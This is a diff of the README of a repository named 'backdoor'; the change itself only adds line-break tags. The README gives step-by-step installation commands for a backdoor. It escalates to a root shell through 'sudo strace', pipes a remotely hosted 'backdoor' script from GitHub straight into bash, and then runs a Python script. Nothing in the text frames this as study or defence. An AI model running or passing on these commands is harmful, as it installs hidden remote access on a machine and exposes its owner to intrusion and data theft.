Hussnain-Khan/backdoor/README.md

 To escalate privileges use this command:

-Command:sudo strace -o /dev/null /bin/bash
+Command:sudo strace -o /dev/null /bin/bash<br>
-Command: cd (Change Directory)
+Command: cd (Change Directory)<br>
-Command: curl -s https://raw.githubusercontent.com/Hussnain-Khan/backdoor/main/Bash/backdoor | bash
+Command: curl -s https://raw.githubusercontent.com/Hussnain-Khan/backdoor/main/Bash/backdoor | bash<br>

 ___________________________________

-Once this done, Clone the reopsitory in your system and navigate from terminal to Python folder directory and run `python sys.py`
+Once this done, Clone the reopsitory in your system and navigate from terminal to Python folder directory and run <br>
+`python sys.py`

 B) how your backdoor works internally